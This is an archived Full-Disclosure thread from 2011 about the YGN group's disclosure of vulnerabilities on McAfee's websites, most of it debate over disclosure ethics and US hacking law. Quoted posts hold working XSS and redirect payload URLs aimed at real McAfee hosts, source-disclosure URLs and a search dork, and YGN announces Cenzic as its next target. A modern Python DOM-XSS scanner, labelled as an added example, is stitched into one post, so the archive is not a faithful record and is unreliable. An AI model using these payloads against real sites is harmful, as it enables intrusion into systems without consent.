Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-04-06 Thread MustLive
Hello YGN Ethical Hacker Group!

Just after you disclosed your findings at McAfee's sites, I congratulated
you on the nice disclosure and started waiting for the reaction.

And a few days later I read a few articles in Network World about this issue
(http://www.networkworld.com/news/2011/032811-mcafee-security-holes.html and
http://www.networkworld.com/news/2011/033011-hackers-ygn-mcafee.html). So
the reaction and buzz came quickly. And on a large scale: as a simple
Google dork shows, there are a lot of sites (up to 128000 results) that posted
this news.

Mostly it's reposting of the same news, but still a lot of attention to your
disclosure. In February in our conversation I said that publishing the
video about holes at McAfee's sites would bring attention, but in this
case most of the attention was brought by the disclosure on the FD mailing
list :-) (and a lot of attention). But that video can still come in handy for
creating even more buzz about this issue.

The most important thing in all these news articles is that they claim
that USA law was defied. All these journalists and news copy-pasters are
not familiar with the laws (USA laws in particular), so they're just
incorrectly blaming YGN Ethical Hacker Group. As I wrote in 2009 in my article
Hacking of web sites, security researches, disclosure and legislation
(http://websecurity.com.ua/articles/security_researches_and_legislation/eng/),
which was published on The Web Security Mailing List, particularly in item 5
of the article (where I wrote about the legislation of Ukraine and the USA),
security research, including finding and disclosing vulnerabilities at
web sites, is legal. So journalists must first get familiar with their own
legislation before writing such articles with such incorrect statements
about other people.

P.S.

Cenzic is a hole-loving company: earlier I wrote in my news about a hole in
their site's search engine which I found in 2006. And it's quite possible
that since then they haven't moved far away from that approach. So I wish
you good luck in your quest for Cenzic's holes ;-).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Vulnerabilities in *McAfee.com
From: YGN Ethical Hacker Group 
Date: Mon, 28 Mar 2011 00:02:47 +0800

Vulnerabilities in *McAfee.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-04-01 Thread Cal Leeming
+1.

I've come across countless companies who had idiotic technical directors who
didn't even want you speaking up in meetings about how bad their network
was, let alone in public.

A lot of it comes down to pride/image; if someone starts questioning their
job's worth, they get all pissy about it, plus a lot of people find it
*extremely* difficult to take constructive criticism and/or advice
within their own remit.

Personally, I'm completely honest and open when I fuck something up. If a
client's network goes down cos I accidentally plugged a 12V cable tester into
core switch gear causing a site-wide telecoms outage for 20 minutes (lol),
I'll come right out and say "Yeah, I did bad." Whereas most people try and
cover it up.

Different scenario, but same principle.

On Thu, Mar 31, 2011 at 1:13 PM, BlackHawk  wrote:

> Nothing new under the sun.. I have done some security testing on _open
> source_ webapps, and most of the time
> if you alert the publisher of your findings (most of the time remote
> code executions, not "boring" XSS) the answer is typically "F*** off,
> we do not need your help / you are lying / you are a criminal /
> etc. etc." showing that bug finding is still looked at with diffidence
> by many people;
>
> on the other side admins are so proud of themselves that they do not
> want other people to know they have badly coded something, look at
> this:
> http://forums.pligg.com/questions-comments/23065-pligg-1-1-3-security-vulnerabilities.html#post103328
>
> to close with a semi-serious joke: put all this together and you will
> know why the black market for selling exploits is increasing in size: at
> least someone will appreciate your work and eventually recompense
> you for it..
>
> On Wed, Mar 30, 2011 at 9:33 PM, Cal Leeming  wrote:
> >
> >
> >
> > Like with most laws, the key point is "intent". If your intention was
> > clearly not malicious, then you are safe.
>
>
>
> --
> BlackHawk - hawkgot...@gmail.com
>
> Sent with Gmail
>

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-31 Thread coderman
On Thu, Mar 31, 2011 at 3:30 PM,   wrote:
> ...
> Ask Randal Schwartz how that worked out for him. "intent" doesn't
> enter into it as much as a defendant may like.

intel has a long history of legal strong-arming against
those who provoke the beast's wrath.

it doesn't help that ORS 164.377 is overly broad for selective
prosecution; factor in the InfraGard partnership direct line with
technical and economic clout and you've got influence over legal
levers too large and plentiful to resist beating convenient targets
with. so perhaps this example is not the most representative of the
typical case, and certainly not of title 18.


as for aggro intel, some early indicators are that they have improved on this
posture. i hope they keep it up.


by the way Intel Corp., i'm still waiting on that apology for the
internal smearing in the company newsletter to pimp centrino security
and fear monger wifi back in the day. if you're truly sorry you could
cover the cost of compromised equipment from the black bag you sabre
rattled for. :/
call me!



[ not holding my breath... ]



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-31 Thread Thor (Hammer of God)
I should clarify my use of "intent" in previous replies -

The "intent" part of the process would be from the judge's point of view even in
the absence of "concrete" evidence. As you know, actual court cases are not
what we see on TV, and the judge has far more power than one may think. Even
if the defense argues that the actions by the defendant were acceptable, if the
judge thinks that the intent of the individual was to exceed access, then they
are hosed.

It wasn't meant to imply that saying "I didn't intend to bring their network
down" would be of any benefit to a defendant.

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of 
valdis.kletni...@vt.edu
Sent: Thursday, March 31, 2011 3:30 PM
To: Cal Leeming
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, 30 Mar 2011 20:33:56 BST, Cal Leeming said:
> Like with most laws, the key point is "intent". If your intention was 
> clearly not malicious, then you are safe.

Ask Randal Schwartz how that worked out for him. "intent" doesn't enter into
it as much as a defendant may like.

http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_1030000-.html

Intent is not mentioned at all.  You exceed the authorized access, you're
guilty under 18 USC 1030.  1030 (a)(2)(C) is the really expansive one, as
"protected computer" is defined down in (e)(2)(B) to include anything used in
interstate commerce (and yes, DAs *HAVE* argued "The computer has a web
browser and thus could get to amazon.com, so it's interstate commerce time").

Doesn't matter if you were trying to save the world at the time (as Gary 
McKinnon found out).

A better approach is to argue the definition of "authorized access" as it 
applies to an Internet-facing server...



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-31 Thread Valdis . Kletnieks
On Wed, 30 Mar 2011 20:33:56 BST, Cal Leeming said:
> Like with most laws, the key point is "intent". If your intention was
> clearly not malicious, then you are safe.

Ask Randal Schwartz how that worked out for him. "intent" doesn't
enter into it as much as a defendant may like.

http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_1030000-.html

Intent is not mentioned at all.  You exceed the authorized access, you're
guilty under 18 USC 1030.  1030 (a)(2)(C) is the really expansive one, as
"protected computer" is defined down in (e)(2)(B) to include anything used in
interstate commerce (and yes, DAs *HAVE* argued "The computer has a web
browser and thus could get to amazon.com, so it's interstate commerce time").

Doesn't matter if you were trying to save the world at the time (as Gary
McKinnon found out).

A better approach is to argue the definition of "authorized access" as it
applies to an Internet-facing server...



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-31 Thread Valdis . Kletnieks
On Thu, 31 Mar 2011 15:18:08 BST, Jacqui Caren-home said:
> A lot of businesses do not consider "constructive criticism" as positive and
> will sometimes do everything in their power to "PR" you to death - it's
> often seen as cheaper than fixing the problem.

In fact, it often *is* cheaper than actually fixing the problem (especially
when the reported problem is "3 pages are vulnerable to XSS", but the
actual problem is "48,394 pages are vulnerable to XSS" or similar).




Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-31 Thread Jacqui Caren-home
On 31/03/2011 13:13, BlackHawk wrote:
> to close with a semi-serious joke: put all this together and you will
> know why black market selling of exploit is increasing his size: at
> least someone will appreciate your work and eventually recompensate
> you for it..

Everyone makes mistakes. Being unable to admit fault is a serious character
flaw for a developer. However, for a business this may be a commercially
sensible strategy.

A long time ago I was asked to demo a MAC web server memory leak to a .mil
address. I declined but provided the details and test script to the contact
and left him to run his own tests. The server turned into a linux box a few
months later. My worry was that my demo would be construed as an attack by his
"higher ups".

A lot of businesses do not consider "constructive criticism" as positive and
will sometimes do everything in their power to "PR" you to death - it's
often seen as cheaper than fixing the problem.

Jacqui



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-31 Thread BlackHawk
Nothing new under the sun.. I have done some security testing on _open
source_ webapps, and most of the time
if you alert the publisher of your findings (most of the time remote
code executions, not "boring" XSS) the answer is typically "F*** off,
we do not need your help / you are lying / you are a criminal /
etc. etc." showing that bug finding is still looked at with diffidence
by many people;

on the other side admins are so proud of themselves that they do not
want other people to know they have badly coded something, look at
this:
http://forums.pligg.com/questions-comments/23065-pligg-1-1-3-security-vulnerabilities.html#post103328

to close with a semi-serious joke: put all this together and you will
know why the black market for selling exploits is increasing in size: at
least someone will appreciate your work and eventually recompense
you for it..

On Wed, Mar 30, 2011 at 9:33 PM, Cal Leeming  wrote:
>
>
>
> Like with most laws, the key point is "intent". If your intention was
> clearly not malicious, then you are safe.



-- 
BlackHawk - hawkgot...@gmail.com

Sent with Gmail



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-31 Thread Cal Leeming
On Wed, Mar 30, 2011 at 8:29 PM, Ryan Sears  wrote:

>
> How about the scenario in which one statically audits some javascript
> sitting on a site, to notice it does something in an unsafe manner, and can
> be used in an XSS attack without actually making it happen? There was no
> actual 'attacking' done, but there was still a vulnerability discovered. Is
> THAT considered an illegal act? Is putting a '<3' into a web form/comment
> section considered attacking it if you look at the source to see how the
> character translated? What if you just wanted to make an ascii heart? My
> point is it's a very blurry line, and there are a lot of scenarios where one
> may discover a vulnerability without even having to do anything.
>

Like with most laws, the key point is "intent". If your intention was
clearly not malicious, then you are safe.


>
> As for the source code disclosures, there was absolutely no 'attacking'
> done. This was a huge oversight in the site devs, and they were giving that
> information to anyone who requested it, plain and simple. What about the
> Tumblr incident that happened a while ago? Just because they screwed up a
> production script, they ended up leaking massive amounts of internal
> infrastructure details, as well as private API keys, and other stuff that
> could be used for nefarious means. Is it illegal to visit that page? I think
> not, as THEY were putting the information out there (albeit by accident),
> but I as a user have no way to know that.
>
> I understand what you're saying about them not asking people to look for
> bugs, but it IS the internet. Companies don't typically ask external people
> to audit their executables either, but people do it for a number of reasons
> (mainly education).
>
> If they leave their site up, people will potentially poke at it. That's
> just the way it is. If I have a vested interest in a company (be it monetary
> or simply supporting its cause), I personally want to see the site
> flourish, because I am then a part of that site. I want to make sure that my
> personal information is protected, and if I do find a bug somewhere, I
> report it. I recently found an XSS in OpenDNS's landing page, and they were
> very appreciative, very professional, and prompt to respond. This made me
> WANT to work with them further to ensure that their infrastructure was
> hardened to other forms of attack as well. I don't disclose these sorts of
> issues publicly, because I give the developers a chance to fix it, and in my
> past experience most companies are happy that I reported an issue, because I
> could have just as easily not said anything. If it does come down to it
> though, I follow my own public disclosure policy (
> http://talesofacoldadmin.com/disclosure.html) based off Rain Forest
> Puppy's. It basically just asks for somewhat consistent lines of
> communication after I disclose something. If the communication drops (or is
> non-existent), then it's at my own discretion to disclose it in a public
> forum.
>
> I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but
> if choosing to disclose something (even in private) means potential legal
> troubles, then that takes away the motivation for me to disclose it in any
> form. I'm still going to be finding bugs for my own educational purposes,
> but I'll just stop disclosing them. That in itself starts to undermine the
> internet as a whole, leading to the restriction of information exchange,
> which is appalling.
>
> It IS technically illegal to do these sorts of tests without consent, but
> at what point DOES it become a 'test'? There's some cases, granted, in which
> the intention is clear (testing for blind SQL injections, etc) as they leave
> a huge footprint, but there's no explicitly clear line in which it becomes
> illegal. Is adding a ' to my name illegal? What if my 70+ year old
> grandmother did it by accident? Could she be persecuted as well? You can't
> apply the law to only some situations and not others.
>
> I also point you to one of my favorite XKCDs => http://xkcd.com/327/
>
> Is naming your kid something like that technically illegal? Then that
> starts getting into free-speech issues, which are most certainly protected
> by the constitution. If I want my name to be "Ann  Hero", and
> the site doesn't explicitly tell me I can't do so, then how can I be
> expected to reasonably know where their boundaries are? I don't see any
> terms of use for using their website anywhere.
>
> This is all just my opinion though, and sorry for the long message!
>
> Ryan
>
> - Origina

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-31 Thread Cal Leeming
An interesting notion.

I have to say their mailing list comment didn't exactly shine with
professionalism, but there again, nor do mine. So I dunno :p

On Wed, Mar 30, 2011 at 9:10 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> Guys,
>
> Is it because these are Burmese hackers as to why everyone is getting in a
> pickle, e.g eastern hackers attacking western companies? I feel an Obama
> moment coming on, where he condemns the group known as YGN.
>
> Andrew
>

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-31 Thread Cal Leeming
Ohh now I get it. I thought they had just copy and pasted someone else.

My response is now: LOLOLOLOL.

On Wed, Mar 30, 2011 at 4:22 PM, Thor (Hammer of God)
wrote:

> Let's see here... As an "ethical hacker group," you don't like being
> criticized by someone as engaging in illegal activities, so you announce on
> a public site that you are going to attack the company?   Brilliant.
> t
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical Hacker
> Group
> Sent: Wednesday, March 30, 2011 5:44 AM
> To: Pablo Ximenes
> Cc: full-disclosure
> Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
>
> According to xssed.com,  there are two remaining XSS issues:
>
> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>
>
> You guys know our disclosed issues are very simple and can easily be found
> through viewing HTML/JS source codes and simple Google Hacking (
> http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>
> However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
> http://www.cenzic.com/company/management/khera/,  according to Network
> World News editor - Ellen Messmer.  Thus, the next target is Cenzic web
> site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner is.
>
>
> -
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar (Burma)
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd
>
>
>
>
> On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
> > FIY
> >
> > http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-S
> > ecurity-Holes
> >
> >
> > Pablo Ximenes
> > http://ximen.es/
> > http://twitter.com/pabloximenes
> >
> >
> >
> >
> > 2011/3/28 Pablo Ximenes :
> >> blog post about this: http://ximen.es/?p=469
> >>
> >> Please, don't throw stones at me.
> >>
> >> []'s
> >>
> >>
> >> Pablo Ximenes
> >> http://ximen.es/
> >> http://twitter.com/pabloximenes
> >>
> >>
> >>
> >> 2011/3/27 YGN Ethical Hacker Group 
> >>>
> >>> Vulnerabilities in *McAfee.com
> >>>
> >>>
> >>> 1. VULNERABILITY DESCRIPTION
> >>>
> >>> -> Cross Site Scripting
> >>>
> >>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.l
> >>> ocation.replace('attacker.in')
> >>>
> >>> -> Information Disclosure > Internal Hostname:
> >>>http://www.mcafee.com/js/omniture/omniture_profile.js
> >>>
> >>>($ ruby host-extract.rb -a
> >>> http://www.mcafee.com/js/omniture/omniture_profile.js)
> >>>
> >>> -> Information Disclosure > Source Code Disclosure:
> >>>
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/clinic/includes/commoninc/coo
> >>> kiecommon.asp
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/clinic/includes/commoninc/app
> >>> common.asp
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/clinic/includes/commoninc/par
> >>> tnerCodesLibrary.asp
> >>>
> >>> view-source:http://download.mcafee.com/clinic/Includes/common.asp
> >>>
> >>> view-source:http://download.mcafee.com/updates/upgrade_patches.asp
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/updates/common/dat_common.asp
> >>>view-source:http://download.mcafee.com/updates/updates.asp
> >>>view-source:http://download.mcafee.com/updates/superDat.asp
> >>>view-source:http://download.mcafee.com/eval/evaluate2.asp
> >>>
> >>> view-source:http://download.mcafee.com/common/ssi/conditionals.asp
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/common/ssi/errHandler_soft.as
> >>> p
> >>>
> >>> view-source:http://download.mcafee.com/common/ssi/variables.asp
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_c
> >>> ontrols.asp
> >>>
> >>> view-source:http://do

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread YGN Ethical Hacker Group
Thanks for all your inputs and discussions.

We believe keeping this information secret is unethical and irresponsible.



For those who think/criticize that we're unethical/illegal,

there is a so-called "Passive Scanning" technique in security testing.

Passive scanning (a.k.a. Passive Reconnaissance) is basically examining
web site work flows and the source code involved to identify
vulnerabilities without ever attacking the target itself.

Contrary to what most people think, passive scanning allows
everyone to audit any web site without breaking the law and without
alarming the firewalls in front.

Basically it starts as:

1. Do Google Hacking and look for potential information leakage. (Most
of the tools allow you to add your own GH Dorks).

2. Browse the target web site with a scanner that has passive
vulnerability scanning capability - ratproxy, zaproxy, webscarab,
fiddler+watcher, burp-pro or you name it.
Also use metadata extraction tools. And look for potential
information leakage & others.

3. Examine all contents of JavaScript & decompiled Flash/Silverlight/Java Applets.

4. Look for common vulnerable points and misuses,
e.g., for JS files, examine calls like document.URLUnencoded,
document.referrer, document.location, window.location,
location.href, document.URL ...etc.


Passive scan is just a small subset of the assessment realm. Findings are
very limited.

Our recent disclosure of the Plesk open redirect flaw was the result of a
purely passive scan of a static HTML web site -
http://yehg.net/lab/pr0js/advisories/%5Bplesk_7.0-8.2%5D_open_url_redirection
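As an added example, not code from the post or from yehg.net, the following Python script is one way to do the step 4 check above offline: it scans JavaScript text for the DOM sources listed (plus location.search/hash) reaching HTML, script or navigation sinks, tracking taint through simple variable assignments. The sample JavaScript, `find_flows` and its sink and sanitizer lists are this example's own constructions.

```python
"""Passive, offline audit of JavaScript text for DOM-based XSS and redirect risks.

Added example for the "examine JS calls" step. Not code from the post or from
yehg.net: find_flows(), the sink list and the sanitizer list are this example's
own simplifications. It reads JavaScript you already have on disk and sends
nothing to any site. SAMPLE_JS is constructed for the example.
"""
import re

# DOM properties whose value an attacker controls through the URL or the
# referring page: the post's list (referrer spelled as the DOM spells it) plus
# location.search / location.hash, the usual carriers of injected input.
SOURCES = (
    "document.URLUnencoded", "document.URL", "document.referrer",
    "document.location", "window.location", "location.href",
    "location.search", "location.hash",
)

# Places where a string is interpreted as HTML, as script, or as a navigation
# target (the last three are how fragment-driven redirects are usually written).
SINKS = (
    "document.write", ".innerHTML", ".outerHTML", "eval(", "setTimeout(",
    "setInterval(", "window.open(", "location.replace(", "location.assign(",
    "location.href =",
)

# Wrappers whose result we stop treating as attacker-controlled. Simplification:
# encodeURIComponent is right for URL/HTML-text contexts, not for every sink.
SANITIZER_RE = re.compile(r"\s*(encodeURIComponent|encodeURI|parseInt|Number)\(")

# `var x = <expr>` / `x = <expr>` with a single `=` (so `==` is not an assignment).
ASSIGN_RE = re.compile(r"^\s*(?:(?:var|let|const)\s+)?([A-Za-z_$][\w$]*)\s*=(?!=)\s*(.*)$")


def _mentions(expr, names):
    """First name from `names` that occurs in `expr` as a whole identifier, or None."""
    for name in names:
        if re.search(r"(?<![\w$])" + re.escape(name) + r"(?![\w$])", expr):
            return name
    return None


def find_flows(js_text):
    """Return (line_no, source_or_tainted_var, sink, line) for each line on which a
    DOM source, or a variable assigned from one, reaches a sink.

    Taint is tracked per variable across lines, which is enough to catch the
    `var t = location.hash...; top.location.replace(t)` shape. It is not a real
    data-flow analysis: flows through object properties, function parameters or
    helper functions are missed, and a source and sink on one line are reported
    even if the code between them neutralises the value."""
    tainted = set()
    findings = []
    for no, line in enumerate(js_text.splitlines(), 1):
        code = line.split("//", 1)[0]   # drop // comments (also cuts "http://" literals)
        sink = next((s for s in SINKS if s in code), None)
        if sink:
            src = next((s for s in SOURCES if s in code), None) or _mentions(code, sorted(tainted))
            if src:
                findings.append((no, src, sink, line.strip()))
        m = ASSIGN_RE.match(code)
        if m:
            name, rhs = m.groups()
            if SANITIZER_RE.match(rhs):
                tainted.discard(name)          # wrapped in a sanitizer: treated as clean
            elif any(s in rhs for s in SOURCES) or _mentions(rhs, sorted(tainted)):
                tainted.add(name)              # assigned from a source or a tainted var
            else:
                tainted.discard(name)          # reassigned from a clean value
    return findings


# Constructed sample: a fragment-driven redirect helper of the shape the
# advisory's "#javascript:top.location.replace(...)" finding points at, plus a
# referrer echo, a direct document.URL write, and two harmless lines.
SAMPLE_JS = """\
// constructed sample, not real site code
var target = location.hash.substring(1);
if (target) {
    top.location.replace(target);
}
var q = document.referrer;
document.getElementById("from").innerHTML = "Came from: " + q;
document.write("<p>" + document.URL + "</p>");
var n = document.title;
document.getElementById("t").innerHTML = n;
var safe = encodeURIComponent(location.search);
console.log(safe);
"""

if __name__ == "__main__":
    for no, src, sink, text in find_flows(SAMPLE_JS):
        print(f"line {no}: {src} -> {sink}   {text}")
    # expected: line 4 (target -> location.replace(), line 7 (q -> .innerHTML)
    # and line 8 (document.URL -> document.write); lines 10 and 12 stay quiet.
```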



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Ryan Sears
Agreed, If you put your site on the open internet, you have to take into 
account the inherent hostilities that go along with that action. 

A security firm like Mcafee /knows/ about these vulnerabilities. Guaranteed. If
they offer services to make others' sites 'hacker proof', their first order of
business should be making sure that their infrastructure doesn't have blatantly
obvious security holes. I'm not saying that they should catch EVERYTHING, but
these are bugs that an automated scanner could easily pick up. I do understand
that a large infrastructure like theirs has pages that have been created by
people with varying degrees of competence, but that's why they need to do
inclusive penetration tests of their own network. At the very least they need
to have some mechanism in place to detect (and possibly defer) these sorts of
attacks.

The way I see it, when a company hides behind legal threats to deter people 
from finding and reporting bugs, all they're doing is hurting themselves. Look 
at how Microsoft has turned around. 10 years ago they weren't dealing with 
people reporting issues in the right way, but they soon came to realize that by 
listening to the hackers that ARE coming forward with issues, they not only 
help themselves, but help the community as well. It's a win/win scenario for 
EVERYONE. 

You can tell a vast amount about how an infrastructure is run from just a bit
of poking. If there are blatant security holes everywhere, then they clearly
don't take security seriously. If they filter for SQL injections in javascript,
then the devs have no clue what they're actually trying to do. If you see SQL
errors, chances are there are more serious issues to boot. I usually limit my
poking to the very basic of basics when I do use a new service, and the more
transparent they are (think reddit) the more I trust them. They even have a
full subreddit devoted to finding and learning about XSS attacks. One word,
awesome.

Simply put, in my opinion you can't blame a pen-tester for looking for bugs in
a site. The only time it should be considered malicious is when it's used in a
malicious way. If I find an XSS in a webform, and I report it along with
remediation suggestions I feel as though I'm doing the site a favor. It's
unfortunate to think that some see this as a criminal activity.

Ryan

- Original Message -
From: "Jeffrey Walton" 
To: "Thor (Hammer of God)" 
Cc: "Ryan Sears" , "full-disclosure" 

Sent: Wednesday, March 30, 2011 5:28:59 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, Mar 30, 2011 at 4:36 PM, Thor (Hammer of God)
 wrote:
> I have that very strip printed and on the wall in my office :)    You make 
> several points, but the response that immediately comes to mind is that I 
> actually see a difference between actively scanning content for 
> structural/coding vulnerabilities, and entering data in a search box.  I 
> don't know if there is any basis for this legally, but I feel that if you put 
> a box up and I can search for something, then I can put whatever I want in 
> that box.  You (the royal you) are basically soliciting people to put data in 
> the box.   However, you are not asking anyone to spider your site or run 
> scans against it.
>
If a person or company places a host on the public internet and offers
a service, I don't think it's reasonable to claim some input is "fair"
and other input is "unfair". Perhaps the person or company should not
offer public services in the first place.

It seems reasonable (to me) that users of the site expect that the
site is relatively defect free and secure. A tech-savvy user who tests
the site through its public interface is simply exercising due
diligence before using the services of the site. I personally feel
that individuals and companies which want to criminalize 'due
diligence' are cowardly at best. I don't want to use the services of
such a site; nor do I want to have an account on such a system.

Jeff


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Jeffrey Walton
On Wed, Mar 30, 2011 at 4:36 PM, Thor (Hammer of God)
 wrote:
> I have that very strip printed and on the wall in my office :)    You make 
> several points, but the response that immediately comes to mind is that I 
> actually see a difference between actively scanning content for 
> structural/coding vulnerabilities, and entering data in a search box.  I 
> don't know if there is any basis for this legally, but I feel that if you put 
> a box up and I can search for something, then I can put whatever I want in 
> that box.  You (the royal you) are basically soliciting people to put data in 
> the box.   However, you are not asking anyone to spider your site or run 
> scans against it.
>
If a person or company places a host on the public internet and offers
a service, I don't think it's reasonable to claim some input is "fair"
and other input is "unfair". Perhaps the person or company should not
offer public services in the first place.

It seems reasonable (to me) that users of the site expect that the
site is relatively defect free and secure. A tech-savvy user who tests
the site through its public interface is simply exercising due
diligence before using the services of the site. I personally feel
that individuals and companies which want to criminalize 'due
diligence' are cowardly at best. I don't want to use the services of
such a site; nor do I want to have an account on such a system.

Jeff



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
I have that very strip printed and on the wall in my office :)  You make
several points, but the response that immediately comes to mind is that I
actually see a difference between actively scanning content for
structural/coding vulnerabilities, and entering data in a search box.  I don't
know if there is any basis for this legally, but I feel that if you put a box
up and I can search for something, then I can put whatever I want in that box.
You (the royal you) are basically soliciting people to put data in the box.
However, you are not asking anyone to spider your site or run scans against it.

That said, my guess is that it would all come down to intent.  If I put ' or 
1=1-- (like the site I had that some camper sniped) in, it's a pretty sure bet 
that I'm looking for SQL injection.  But I don't know if the search box 
"entitles" me to do that.  It certainly is interesting list fodder though...  

>-Original Message-
>From: Ryan Sears [mailto:rdse...@mtu.edu]
>Sent: Wednesday, March 30, 2011 12:30 PM
>To: Thor (Hammer of God)
>Cc: full-disclosure; noloa...@gmail.com
>Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
>
>
>How about the scenario in which one statically audits some javascript sitting
>on a site, to notice it does something in an unsafe manner, and can be used in
>an XSS attack without actually making it happen? There was no actual
>'attacking' done, but there was still a vulnerability discovered. Is THAT
>considered an illegal act? Is putting a '<3' into a web form/comment section
>considered attacking it if you look at the source to see how the character
>translated? What if you just wanted to make an ascii heart? My point is it's a
>very blurry line, and there are a lot of scenarios where one may discover a
>vulnerability without even having to do anything.
>
>As for the source code disclosures, there was absolutely no 'attacking' done.
>This was a huge oversight in the site devs, and they were giving that
>information to anyone who requested it, plain and simple. What about the
>Tumblr incident that happened a while ago? Just because they screwed up a
>production script, they ended up leaking massive amounts of internal
>infrastructure details, as well as private API keys, and other stuff that
>could be used for nefarious means. Is it illegal to visit that page? I think
>not, as THEY were putting the information out there (albeit by accident), but
>I as a user have no way to know that.
>
>I understand what you're saying about them not asking people to look for
>bugs, but it IS the internet. Companies don't typically ask external people to
>audit their executables either, but people do it for a number of reasons
>(mainly education).
>
>If they leave their site up, people will potentially poke at it. That's just 
>the way
>it is. If I have a vested interest in a company (be it monetary or simply
>supporting it's cause), I personally want to see the site flourish, because I 
>am
>then a part of that site. I want to make sure that my personal information is
>protected, and if I do find a bug somewhere, I report it. I recently found a 
>XSS
>in OpenDNS's landing page, and they were very appreciative, very
>professional, and prompt to respond. This made me WANT to work with them
>further to ensure that their infrastructure was hardened to other forms of
>attack as well. I don't disclose these sorts of issues publicly, because I 
>give the
>developers a chance to fix it, and in my past experience most companies are
>happy that I reported an issue, because I could have just as easily not said
>anything. If it does come down to it though, I follow my own public disclosure
>policy (http://talesofacoldadmin.com/disclosure.html) based off Rain Forest
>Puppy's. It basically just asks for somewhat consistent lines of communication
>after I disclose something. If the communication drops (or is non-existent),
>then it's at my own discretion to disclose it in a public forum.
>
>I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but if
>choosing to disclose something (even in private) means potential legal
>troubles, then that takes away the motivation for me to disclose it in any
>form. I'm still going to be finding bugs for my own educational purposes, but
>I'll just stop disclosing them. That in itself starts to undermine the 
>internet as a
>whole, leading to the restriction of information exchange, which is appalling.
>
>It IS technically illegal to do these sorts of tests without consent, but at 
>what
>point DOES it become a 'test'? There's some cases, granted, in which the
>intention is cl

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
Nah, not from my POV anyway…   I’m not concerned with who is attacking whom 
from where – I just tend to say something when people claim to be “ethical 
hackers” but then say they are going to target a security company because it 
criticized the group for targeting people.   It seems redundantly ironic.  Or 
would that be ironically redundant?
t

From: andrew.wallace [mailto:andrew.wall...@rocketmail.com]
Sent: Wednesday, March 30, 2011 1:10 PM
To: noloa...@gmail.com; n...@myproxylists.com; c...@foxwhisper.co.uk; 
pa...@ximen.es; m...@b3nji.com; Thor (Hammer of God); uuf6...@gmail.com; 
rdse...@mtu.edu
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

Guys,

Is it because these are Burmese hackers as to why everyone is getting in a 
pickle, e.g. eastern hackers attacking western companies? I feel an Obama moment 
coming on, where he condemns the group known as YGN.

Andrew
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Ryan Sears

How about the scenario in which one statically audits some javascript sitting 
on a site, to notice it does something in an unsafe manner, and can be used in 
an XSS attack without actually making it happen? There was no actual 
'attacking' done, but there was still a vulnerability discovered. Is THAT 
considered an illegal act? Is putting a '<3' into a web form/comment section 
considered attacking it if you look at the source to see how the character 
translated? What if you just wanted to make an ascii heart? My point is it's a 
very blurry line, and there are a lot of scenarios where one may discover a 
vulnerability without even having to do anything.

As for the source code disclosures, there was absolutely no 'attacking' done. 
This was a huge oversight in the site devs, and they were giving that 
information to anyone who requested it, plain and simple. What about the Tumblr 
incident that happened a while ago? Just because they screwed up a production 
script, they ended up leaking massive amounts of internal infrastructure 
details, as well as private API keys, and other stuff that could be used for 
nefarious means. Is it illegal to visit that page? I think not, as THEY were 
putting the information out there (albeit by accident), but I as a user have no 
